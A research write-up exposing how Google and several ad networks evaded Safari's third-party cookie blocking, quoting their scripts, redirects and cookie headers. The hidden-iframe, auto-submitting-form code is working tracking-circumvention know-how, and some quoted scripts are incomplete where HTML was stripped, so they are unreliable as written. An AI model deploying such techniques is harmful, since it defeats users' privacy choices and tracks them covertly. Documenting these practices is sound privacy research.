In a FourthParty crawl of the homepages of the Alexa U.S. top 500 websites, we detected the cookie syncing mechanism on 39 pages. This figure likely underestimates the prevalence of Google’s cookie syncing code since many websites show less advertising on their homepage. We observed the mechanism on New York Times and MSNBC article pages, for example, but not on their homepages.
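Counting pages like this is straightforward once a crawl has logged the requests each page triggers. The sketch below assumes a hypothetical log shape (page URL mapped to a list of request URLs); it is not FourthParty's actual schema, and the sample pages are made up.

```javascript
const SYNC_IFRAME_PREFIX = "http://googleads.g.doubleclick.net/pagead/drt/s";

// `crawl` maps each page URL to the request URLs observed while loading it
// (hypothetical shape, for illustration only).
function pagesWithSync(crawl) {
  return Object.keys(crawl).filter((page) =>
    crawl[page].some((requestUrl) => requestUrl.startsWith(SYNC_IFRAME_PREFIX))
  );
}

// Made-up sample data.
const sampleCrawl = {
  "http://news.example/": [
    "http://news.example/style.css",
    "http://googleads.g.doubleclick.net/pagead/drt/s",
  ],
  "http://shop.example/": ["http://shop.example/app.js"],
};

const syncPages = pagesWithSync(sampleCrawl);
console.log(syncPages.length + " of " + Object.keys(sampleCrawl).length + " pages include the mechanism");
```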

The iframe loads a page that contains a meta refresh to http://google.com/pagead/drt/ui.

Apologies for any overflow; here and throughout the post I err on the side of preserving original formatting.

The response at http://google.com/pagead/drt/ui depends on whether the user is logged into Google. If the user is not logged in, the response includes a Location header that directs the browser back to googleads.g.doubleclick.net with some information in the p and ut parameters of the Request-URI.

Location: https://googleads.g.doubleclick.net/pagead/drt/si?p=CAA&ut=AFAKxlQAAAAATzuSTM-wZva6TmRV_FF7YdF2nggZfnlI

If the user is logged in, the response directs the user to Google’s authentication service.

Location: https://accounts.google.com/ServiceLogin?service=doritos&passive=true&go=true&continue=https://googleads.g.doubleclick.net/pagead/drt/si?p=CAEY9cLA-gQ&ut=AFAKxlQAAAAATz2v-fyl5V0PcBdEsvg95beKTozmJSql

The authentication service then directs the user back to googleads.g.doubleclick.net.

(A quick explanation of the “Doritos” reference—as I understand it, that’s Google’s internal codename for social personalization of third-party display advertising.)

location:https://googleads.g.doubleclick.net/pagead/drt/si?p=CAEY9cLA-gQ&ut=AFAKxlQAAAAATz2v-fyl5V0PcBdEsvg95beKTozmJSql&pli=1&auth=DQAAAIUAAAAPNIlph4K8ZDuUPlslr38CnSgqvc7E26I5RwkOrDDU7r81Q8H6iVYltrf4TEcE1haR9gSXQuARTXXHSWIW6EnmOyb2inWlPm28lprT6Hmkhn_PzhpuYlNUrSFZ9RdOAdro-hHVwMHQojKjOSSkQxQIIvetbMiMIOTcK88Ltq7Td9rQHLHJ_QrNb7EDz727XUM

Google’s documentation suggests that the p and ut parameters include an encryption of the user’s login state and, if logged in, account ID. (The Google design document makes a number of technical claims about how the syncing mechanism preserves user privacy. This post does not address those claims.)
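For readers following along in their own captures, here is a small sketch that pulls the p and ut parameters out of a Location header using the standard URL API. The header value is the logged-out example shown above; the function name is ours.

```javascript
// Location header from the logged-out example above.
const loggedOutLocation =
  "https://googleads.g.doubleclick.net/pagead/drt/si?p=CAA&ut=AFAKxlQAAAAATzuSTM-wZva6TmRV_FF7YdF2nggZfnlI";

// Extracts the redirect target and the two opaque parameters.
function syncParams(locationHeader) {
  const url = new URL(locationHeader);
  return {
    host: url.hostname,
    path: url.pathname,
    p: url.searchParams.get("p"),
    ut: url.searchParams.get("ut"),
  };
}

const parsed = syncParams(loggedOutLocation);
console.log(parsed);
```

The values stay opaque here; the sketch only separates them, it does not attempt to decode them.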

In a browser other than Safari, the response sets a “_drt_” social personalization cookie on .doubleclick.net. If the user is not logged into Google, the cookie’s value is “NO_DATA”, and the cookie is set to expire in 12 hours.

set-cookie:_drt_=NO_DATA; expires=Fri, 17-Feb-2012 13:37:41 GMT; path=/; domain=.doubleclick.net; HttpOnly

If the user is logged into Google, the “_drt_” cookie contains an encryption of the user’s Google account ID, set to expire in 24 hours.

set-cookie:_drt_=AFkicjesF-jVECSOLRa1a-hf14FYVKIPEu4goDlxZZdVaxh1D4gDfJ6dvZg7Evnr2C8MluBSk6Nkr8TfL1ksojSb8qsjYHSNMQ; expires=Sat, 18-Feb-2012 01:25:10 GMT; path=/; domain=.doubleclick.net; HttpOnly

My understanding is that the cookie expirations are set to limit syncing frequency. If the user was not logged in at last sync, a sync will not be attempted for at least 12 hours; if the user was logged in, a sync will not be attempted for at least 24 hours.
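That throttling logic can be sketched as follows. This models my reading of the behavior, not Google's code; the function names and the sync time are assumptions (the sync time is simply the logged-out example's expiration minus 12 hours).

```javascript
const HOUR_MS = 60 * 60 * 1000;

// Expiration of the "_drt_" cookie: 12 hours if logged out, 24 if logged in.
function drtExpiry(syncTimeMs, loggedIn) {
  return syncTimeMs + (loggedIn ? 24 : 12) * HOUR_MS;
}

// A new sync is attempted only when no unexpired "_drt_" cookie exists.
function syncDue(drtExpiresMs, nowMs) {
  return drtExpiresMs === null || nowMs >= drtExpiresMs;
}

// Hypothetical sync time, chosen to line up with the logged-out example.
const lastSync = Date.UTC(2012, 1, 17, 1, 37, 41);
const loggedOutExpiry = drtExpiry(lastSync, false);

console.log(new Date(loggedOutExpiry).toISOString());
console.log(syncDue(loggedOutExpiry, lastSync + 6 * HOUR_MS));  // still throttled
console.log(syncDue(loggedOutExpiry, lastSync + 13 * HOUR_MS)); // sync allowed again
```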

In early testing, we noticed that a “PREF” cookie was sometimes set at the same time as the “_drt_” cookie.

set-cookie:PREF=ID=5a7be344032983bc:TM=1325643281:LM=1325643281:S=-BWpqDzbE7gq8rg-; expires=Fri, 03-Jan-2014 02:14:41 GMT; path=/; domain=googleads.g.doubleclick.net

The behavior appeared to stop before we contacted Google about our findings. We have not received information from Google explaining the “PREF” cookie on googleads.g.doubleclick.net. It appears to have the same format as the “PREF” cookie on google.com and the same two-year expiration.

So far, a (relatively) straightforward cookie syncing mechanism. But we noticed a special response at the last step for Safari browsers. We tested 400 User-Agent strings to verify that this is a special case; a spreadsheet of results is available.

Instead of responding with the “_drt_” cookie, the server sends back a page that includes a form and JavaScript to submit the form (using POST) to its own URL.

The response to the form submission then includes the Set-Cookie header for the “_drt_” cookie.

Recall that if a cookie is sent with an HTTP request, Safari’s blocking policy will allow the response to write cookies. Owing to the “_drt_” cookie, all doubleclick.net content is now immunized from Safari’s cookie blocking policy. The next time Google advertising content attempts to install the “id” tracking cookie for .doubleclick.net, it will successfully set. That next attempt may not even require that the user visit another page: We noticed that many Google ads periodically send requests to doubleclick.net, especially to a URL with the base http://ad.doubleclick.net/activity. A response to one of these requests can include a Set-Cookie header for the “test_cookie” cookie, which Google uses to make sure cookies successfully set (presumably to avoid wasting IDs and associated resources). A response to a subsequent request may then include a Set-Cookie header for the “id” cookie.
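The chain of events is easier to see in a toy model. The sketch below is not WebKit's logic. It encodes only two rules: a response may write cookies if the request already carried a cookie for that domain, and (an assumption inferred from the form steps above) a response to a form submission may write cookies. Cookie values are placeholders.

```javascript
// Toy model of the blocking behavior described in this post. Not WebKit's code.
class ToyCookieJar {
  constructor() {
    this.byDomain = new Map(); // cookie domain -> Map of name -> value
  }

  hasCookiesFor(domain) {
    const cookies = this.byDomain.get(domain);
    return cookies !== undefined && cookies.size > 0;
  }

  // Applies one response's Set-Cookie; returns true if the cookie was stored.
  receive({ domain, name, value, firstParty = false, formSubmission = false }) {
    // If the jar holds a cookie for the domain, the request would have sent it.
    const allowed = firstParty || formSubmission || this.hasCookiesFor(domain);
    if (allowed) {
      if (!this.byDomain.has(domain)) this.byDomain.set(domain, new Map());
      this.byDomain.get(domain).set(name, value);
    }
    return allowed;
  }
}

const jar = new ToyCookieJar();
const adDomain = ".doubleclick.net";
const outcomes = [
  // Ordinary third-party ad response: blocked.
  jar.receive({ domain: adDomain, name: "id", value: "placeholder" }),
  // Response to the form POST: allowed, sets "_drt_".
  jar.receive({ domain: adDomain, name: "_drt_", value: "NO_DATA", formSubmission: true }),
  // Later ad responses: allowed, because "_drt_" now rides along with requests.
  jar.receive({ domain: adDomain, name: "test_cookie", value: "placeholder" }),
  jar.receive({ domain: adDomain, name: "id", value: "placeholder" }),
];
console.log(outcomes); // [ false, true, true, true ]
```

One cookie set through the form path is enough: every later response from the same domain passes the check.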

We confirmed that Google’s doubleclick.net “id” cookie was functioning in Safari by observing behavioral interest categories appear in Google Ads Preferences. Here is an example set of inferred interests after browsing the New York Times website.

Google Ads Preferences in a Fresh Instance of Safari After Browsing the New York Times

Vibrant Media

Vibrant Media is a contextual advertising network that primarily offers in-text and display advertising. We found conclusive evidence that Vibrant deliberately circumvents Safari’s third-party cookie blocking feature: one of the URLs involved in the circumvention is for the resource /safari.jsp. The following steps describe the circumvention technology as deployed on answers.com. We observed identical behavior at the various region-specific subdomains of cbslocal.com.

Vibrant’s main advertising script loads from http://answers.us.intellitxt.com/intellitxt/front.asp?ipid=31690. When the browser has a Safari User-Agent string and no Vibrant cookie, the script includes this code:

(function() {try {var e=document.createElement('iframe');e.style.display='none';e.src='http://answers.us.intellitxt.com/safari.jsp?t='+(new Date()).getTime();var b=document.getElementsByTagName('body')[0];b.insertBefore(e,b.firstChild);}catch(x){}})();

The Safari-specific code executes, adding an invisible iframe to the page.

The Request-URI parameter t is the current time in milliseconds, presumably used to prevent caching.

The iframe contains a form and a body onload handler that submits the form.

The response to the form contains no content and an instruction to set a Vibrant ID cookie.

Set-Cookie: VM_USR=AG75nlrejUwdiE6n3+naS1YAADwZAAA8VQEAAAE1gRigFAA-; Domain=.intellitxt.com; Expires=[now + 2 months]; Path=/

The Request-URI parameter x=1 appears to control whether the response includes the form page or a Set-Cookie header.

We confirmed that the “VM_USR” cookie is a Vibrant ID by checking the Network Advertising Initiative’s cookie status page.

Active Vibrant Media Cookie Status Indicator

We verified that the NAI indicator is based on the presence of a valid “VM_USR” cookie, not the presence of any cookie or any “VM_USR” cookie.

Media Innovation Group

Media Innovation Group (MIG) is an advertising technology provider within the WPP family of companies. MIG’s “Zeus Advertising Platform” (ZAP) is WPP’s “integrated advertising and analytics platform”. According to a report from a vendor, ZAP “is one of the cornerstone products created by MIG” that “provides a holistic view of site analytics and campaign data for a comprehensive understanding of every individual consumer.” ZAP “collects and stores over 13 months of historical user-level data and draws from it to provide complex and robust analysis.” With ZAP, “MIG is currently tracking the effectiveness of every single advertising element within many live campaigns that reach hundreds of millions of unique users per month . . . .”

We found that some MIG advertising content included a script that circumvents Safari’s cookie blocking feature. Here is the relevant part of one such script we discovered at http://b3.mookie1.com/2/B3DM/DLX/1672705484@x71. A few clarifying notes: mookie1.com is a MIG domain (go figure), is_http stores whether the content is loaded over HTTP, and ZAP_id stores the “id” cookie.

if(is_http) {
  if(ZAP_id.indexOf(':') != -1 || ZAP_id == '') {
    var firstTimeSession = 0;
    function submitSessionForm() {
      if (firstTimeSession == 0) {
        firstTimeSession = 1;
        $("#sessionform").submit();
        //setTimeout(processApplication(),2000);
      }
    }
    $("body").append('
');
    function processApplication() { }
  }

The script creates an invisible iframe and form, then submits the form into the iframe during the onload handler for the iframe.

In response to the form submission, MIG sets cookies and redirects to a 1×1 GIF.

$ curl -i -L -X POST "http://t.mookie1.com/t/v1/imp?"
HTTP/1.1 302 Found
Date: Fri, 17 Feb 2012 09:48:03 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=3025894295853070; path=/; expires=Mon, 18-Mar-13 09:48:03 GMT; path=/; domain=.mookie1.com
Set-Cookie: mdata=1|3025894295853070|1329472083; path=/; expires=Mon, 18-Mar-13 09:48:03 GMT; path=/; domain=.mookie1.com
Set-Cookie: OAX=nVuS508+IlMACEDl; path=/; expires=Mon, 18-Mar-13 09:48:03 GMT; path=/; domain=.mookie1.com
Location: /t/v1/imp/cc?
Content-Length: 277
Connection: close
Content-Type: text/html; charset=iso-8859-1

HTTP/1.1 200 OK
Date: Fri, 17 Feb 2012 09:48:03 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=914844815541839; path=/; expires=Mon, 18-Mar-13 09:48:03 GMT; path=/; domain=.mookie1.com
Set-Cookie: mdata=1|914844815541839|1329472083; path=/; expires=Mon, 18-Mar-13 09:48:03 GMT; path=/; domain=.mookie1.com
Set-Cookie: OAX=T6AK5U8+IlMACoIB; path=/; expires=Mon, 18-Mar-13 09:48:03 GMT; path=/; domain=.mookie1.com
Content-Length: 35
Connection: close
Content-Type: image/gif

GIF87a???????,D;

Comments in MIG’s script indicate that “id” is the ZAP ID cookie and “OAX” is the ID cookie for WPP’s B3 advertising optimization and custom marketplace product. We verified that the script sets a tracking cookie with MIG’s NAI status indicator.
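As a sanity check on the cookies in the 302 response, the sketch below splits each Set-Cookie line into a name and value, then looks inside “mdata”. The interpretation is ours, not MIG's: the second field repeats the “id” value, and the third field reads as a Unix timestamp that matches the response's Date header.

```javascript
// Set-Cookie lines from the 302 response above (attributes abbreviated).
const setCookieLines = [
  "id=3025894295853070; path=/; domain=.mookie1.com",
  "mdata=1|3025894295853070|1329472083; path=/; domain=.mookie1.com",
  "OAX=nVuS508+IlMACEDl; path=/; domain=.mookie1.com",
];

// Returns the name/value pair at the front of a Set-Cookie line.
function cookiePair(line) {
  const first = line.split(";")[0];
  const eq = first.indexOf("=");
  return [first.slice(0, eq).trim(), first.slice(eq + 1).trim()];
}

const migCookies = Object.fromEntries(setCookieLines.map(cookiePair));

// Assumed layout of mdata: flag | ZAP ID | issue time in Unix seconds.
const [mdataFlag, mdataId, mdataSeconds] = migCookies.mdata.split("|");
const mdataIssued = new Date(Number(mdataSeconds) * 1000).toISOString();

console.log(mdataId === migCookies.id); // true
console.log(mdataIssued);               // 2012-02-17T09:48:03.000Z
```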

MIG’s circumvention code appeared (relatively) infrequently; our crawl of the Alexa U.S. top 500 homepages located it on five sites. It is unclear whether MIG served this script only to Safari users. While we did not see the MIG code in any non-Safari browsers, that may have been due to insufficient sample size; we were not able to reliably cause the MIG code to appear.

That said, we believe it is nevertheless reasonable to infer that MIG’s circumvention was intentional. MIG’s code appears to be based on widely-cited sample code by web developer Anant Garg. Even Facebook’s developer documentation points to the sample.

var isSafari = (/Safari/.test(navigator.userAgent));
var firstTimeSession = 0;
function submitSessionForm() {
  if (firstTimeSession == 0) {
    firstTimeSession = 1;
    $("#sessionform").submit();
    setTimeout(processApplication(),2000);
  }
}
if (isSafari) {
  $("body").append('
');
} else {
  processApplication();
}
function processApplication() {
  alert('Session has been set. Now you can start your application!');
}

The resemblance is uncanny. The scripts share the exact same variable names, structure, logic, and library dependency (jQuery 1.3.2 on Google Libraries). Even more compelling, MIG commented out a line that it didn’t need!
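A rough way to quantify the overlap is to list the identifiers the two scripts share. The sketch below uses a naive tokenizer that also picks up words inside strings and comments, so treat it as an illustration rather than a rigorous similarity measure. The excerpts are abbreviated from the two scripts quoted above.

```javascript
// Abbreviated excerpts of the two scripts quoted above.
const migExcerpt = `var firstTimeSession = 0;
function submitSessionForm() { if (firstTimeSession == 0) { firstTimeSession = 1;
$("#sessionform").submit(); //setTimeout(processApplication(),2000);
} } function processApplication() { }`;

const sampleExcerpt = `var firstTimeSession = 0;
function submitSessionForm() { if (firstTimeSession == 0) { firstTimeSession = 1;
$("#sessionform").submit(); setTimeout(processApplication(),2000);
} } function processApplication() { alert('Session has been set.'); }`;

const KEYWORDS = new Set(["var", "function", "if", "else"]);

// Naive tokenizer: every identifier-like run of characters, minus a few keywords.
function identifiers(source) {
  const tokens = source.match(/[A-Za-z_$][A-Za-z0-9_$]*/g) || [];
  return new Set(tokens.filter((t) => !KEYWORDS.has(t)));
}

function sharedIdentifiers(a, b) {
  const inB = identifiers(b);
  return [...identifiers(a)].filter((t) => inB.has(t)).sort();
}

const shared = sharedIdentifiers(migExcerpt, sampleExcerpt);
console.log(shared);
```

Every identifier in the MIG excerpt also appears in the sample, including the function name inside the commented-out line.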

PointRoll

PointRoll is a rich media advertising company owned by Gannett. PointRoll’s corporate website claims that it “[p]ower[s] 55% of all rich media campaigns online” and “serv[es] over 450 billion impressions for more than two-thirds of the Fortune 500 brands . . . .”

We found that a PointRoll cookie helper script circumvents Safari’s cookie blocking. One instance of the script we studied is at http://ads.pointroll.com/PortalServe/?pid=1574300Y14520120126002933&flash=11&time=4|13:53|-8&redir=http://at.atwola.com/adlink/5113/2209587/0/2392/AdId=2327012;BnId=1;itime=219618215;nodecode=yes;link=$CTURL$&pos=s&postal=94305&r=0.18630846054557448.

Here’s the relevant part of the script. Unlike the other examples, this code was passed through a formatter—it’s otherwise unreadable.

function submitSessionForm(name) {
  var sessionForm = document.getElementById(name);
  if (typeof (sessionForm) != 'undefined') {
    var txtStatus = document.getElementById('txt_' + name);
    if (txtStatus.value == 'UNSUBMITTED') {
      txtStatus.value = 'SUBMITTED';
      console.log("form " + name + " Submitted");
      sessionForm.submit();
    }
  }
}
function prCook(name, value, date, dom) {
  console.log("add form: name=" + name + ": value=" + value + ": date=" + date + ": dom=" + dom);
  var date = (typeof (date) != "undefined") ? date : "Fri, 14-Feb-2014 14:47:07 GMT";
  var dom = (typeof (dom) != "undefined") ? dom : "ads.pointroll.com";
  var sCook = '';
  sCook += '
';
  sCook += '';
  sCook += '';
  sCook += '';
  sCook += '';
  sCook += '';
  sCook += '
';
  var d = document.createElement('DIV'), p = document.getElementsByTagName('BODY');
  d.innerHTML = sCook;
  if (p.length < 1) {
    p = document.getElementsByTagName('HTML');
  }
  p[0].appendChild(d);

The script provides a cookie setting function, prCook. When called, the function creates a new div and places within it an invisible iframe and form with the cookie fields specified by the input parameters. An onload handler on the iframe submits the form into the iframe. For example, the call

prCook('example_cookie_name', 'example_cookie_value', 'Fri, 14-Feb-2014 14:47:07 GMT', 'exampledomain.com')

would result in this code being added in a new div element:

Here is the response when the form is submitted.

$ curl -i "http://ads.pointroll.com/clients/pointroll/cookie/drop.ashx?name=example_cookie_name&date=Fri%2C%2014-Feb-2014%2014%3A47%3A07%20GMT&value=example_cookie_value&domain=exampledomain.com"
HTTP/1.1 200 OK
Connection: close
Date: Fri, 17 Feb 2012 07:41:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Access-Control-Allow-Origin: *
X-AspNet-Version: 2.0.50727
Pragma: no-cache
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: example_cookie_name=example_cookie_value; domain=exampledomain.com; expires=Fri, 14-Feb-2014 14:47:07 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 145
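The request in that curl command can be rebuilt from prCook's four arguments. The sketch below is ours, not PointRoll's code: it assumes the form fields map one-to-one onto the query parameters seen in the curl URL, and it uses a GET-style URL only because that is how the request was reproduced here.

```javascript
const DROP_ENDPOINT = "http://ads.pointroll.com/clients/pointroll/cookie/drop.ashx";

// Builds the cookie-drop URL from the same arguments prCook accepts.
// Parameter order follows the curl example above.
function dropUrl(name, value, date, dom) {
  const query = [
    ["name", name],
    ["date", date],
    ["value", value],
    ["domain", dom],
  ]
    .map(([key, val]) => key + "=" + encodeURIComponent(val))
    .join("&");
  return DROP_ENDPOINT + "?" + query;
}

const exampleDropUrl = dropUrl(
  "example_cookie_name",
  "example_cookie_value",
  "Fri, 14-Feb-2014 14:47:07 GMT",
  "exampledomain.com"
);
console.log(exampleDropUrl);
```

Note that the endpoint sets whatever name, value, expiration, and domain the caller supplies, as the Set-Cookie header in the response shows.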

Information	Current Approach	Better Approach	Even Better Approach
Webpage	URL	Fully qualified domain name	Public suffix + 1
Time	Precise timestamp	Day	Week
User Location	IP address	Truncated IP address	Coarse geolocation
Browser	`User-Agent` string	Browser/OS major versions	Browser/OS
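A few of the coarsening steps in the table are simple to sketch. The helper names and sample values below are ours. Reducing a hostname to its public suffix + 1 is left out because it requires the Public Suffix List, and the IP truncation handles IPv4 only.

```javascript
// Webpage: keep only the fully qualified domain name.
function hostnameOf(url) {
  return new URL(url).hostname;
}

// Time: keep only the UTC calendar day.
function dayOf(timestampMs) {
  return new Date(timestampMs).toISOString().slice(0, 10);
}

// User location: zero the last octet of an IPv4 address.
function truncateIPv4(ip) {
  const octets = ip.split(".");
  octets[3] = "0";
  return octets.join(".");
}

// Made-up log record, for illustration.
const coarsened = {
  webpage: hostnameOf("http://www.example.com/articles/2012/02/story.html?ref=home"),
  time: dayOf(Date.UTC(2012, 1, 17, 9, 48, 3)),
  location: truncateIPv4("192.0.2.123"),
};
console.log(coarsened);
```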